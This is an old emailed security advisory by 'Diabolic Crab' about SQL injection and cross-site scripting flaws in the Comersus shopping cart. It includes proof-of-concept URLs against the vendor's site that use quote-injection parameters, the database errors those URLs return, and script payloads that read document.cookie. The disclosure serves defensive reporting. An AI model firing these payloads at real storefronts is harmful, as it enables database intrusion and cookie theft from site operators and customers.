------=_NextPart_001_0011_01C58325.76D757E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory http://www.dbtech.org Deadbolt Computer Technologies ****************************** SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU = CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM ****************************** Get Dcrab's Services to audit your Web servers, scripts, networks, etc = or even code them. Learn more at http://www.dbtech.org Severity: High Title: [Bday Release] Comersus shopping cart has multiple Sql injection = and Cross Site Scripting vulnerabilities Date: 8/07/2005 Vendor: Comersus Vendor Website: http://www.comersus.com Vendor Status: Contacted but no reply Summary: There are, multiple sql injection and cross site scripting = vulnerabilities in Comersus Shopping Cart Proof of Concept Exploits:=20 www.comersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.as= p?name=3D1&email=3D'&Submit=3DJoin%20now%21 SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression 'idProduct=3D''. /comersus6/includes/databaseFunctions.asp, line 39 http://www.comersus.com/comersus6/store/comersus_optReviewReadExec.asp?id= Product=3D'&description=3DDr%252E%2BSolomon%2560s%2BVirex%2B6%252E0%2B%25= 28For%2BMacintosh%2529 SQL INJECTION Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query expression 'idProduct=3D''. /comersus6/includes/databaseFunctions.asp, line 39 www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_listAs= signedPricesToCustomer.asp?idCustomer=3D7&name=3D> Cross Site Scripting www.comersus.com/backofficetest/backOfficePlus/comersus_backoffice_messag= e.asp?message=3D> Cross Site Scripting Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah = and at http://www.hackerscenter.com Author:=20 These vulnerabilities have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my = soon to come out book on Secure coding with php. -------------------------------------------------------------------------= ------- Sincerely,=20 Diabolic Crab=20 ------=_NextPart_001_0011_01C58325.76D757E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt = Computer=20 Technologies
 
******************************
SPECIAL BIRTHDAY=20 RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO = DCRAB@HACKERSCENTER.COM
**= ****************************
 
Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
 
Severity: High
Title: [Bday Release] = Comersus=20 shopping cart has multiple Sql injection and Cross Site Scripting=20 vulnerabilities
Date: 8/07/2005
 
Vendor: Comersus
Vendor Website: http://www.comersus.com
Vendor = Status:=20 Contacted but no reply
Summary: There are, multiple sql injection and = cross=20 site scripting vulnerabilities in Comersus Shopping Cart
 

Proof of Concept Exploits:
 
www.c= omersus.com/comersus6/store/comersus_optAffiliateRegistrationExec.asp?nam= e=3D1&email=3D'&Submit=3DJoin%20now%21
SQL=20 INJECTION
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
 
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'idProduct=3D''.
 
/comersus6/includes/databaseFunctions.asp, line 39
 
http://www.comersus.com/comersus6/sto= re/comersus_optReviewReadExec.asp?idProduct=3D'&description=3DDr%252E= %2BSolomon%2560s%2BVirex%2B6%252E0%2B%2528For%2BMacintosh%2529
SQL= =20 INJECTION
Microsoft OLE DB Provider for ODBC Drivers error = '80040e14'
 
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in = query=20 expression 'idProduct=3D''.
 
/comersus6/includes/databaseFunctions.asp, line 39
 

alert(document.cookie);www.comersus.com/backofficetest/back= OfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustome= r=3D7&name=3D><script>alert(document.cookie);</script= >
Cross=20 Site Scripting